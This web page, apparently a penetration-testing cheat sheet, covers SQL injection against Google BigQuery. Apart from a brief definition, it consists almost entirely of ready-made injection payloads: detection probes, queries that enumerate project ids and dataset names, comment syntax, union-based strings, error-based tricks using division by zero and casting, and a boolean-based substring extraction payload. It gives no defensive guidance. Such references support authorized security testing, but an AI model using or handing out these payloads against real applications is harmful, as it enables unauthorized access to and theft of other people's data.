Skip to content

Google BigQuery SQL Injection

Google BigQuery SQL Injection is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.

Summary

Detection

  • Use a classic single quote to trigger an error: '
  • Identify BigQuery using backtick notation: SELECT .... FROM `` AS ...
SQL Query Description
SELECT @@project_id Gathering project id
SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA Gathering all dataset names
select * from project_id.dataset_name.table_name Gathering data from specific project id & dataset

BigQuery Comment

Type Description
# Hash comment
/* PostgreSQL Comment */ C-style comment

BigQuery Union Based

UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM  (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#

BigQuery Error Based

SQL Query Description
' OR if(1/(length((select('a')))-1)=1,true,false) OR ' Division by zero
select CAST(@@project_id AS INT64) Casting

BigQuery Boolean Based

' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#

BigQuery Time Based

  • Time based functions does not exist in the BigQuery syntax.

References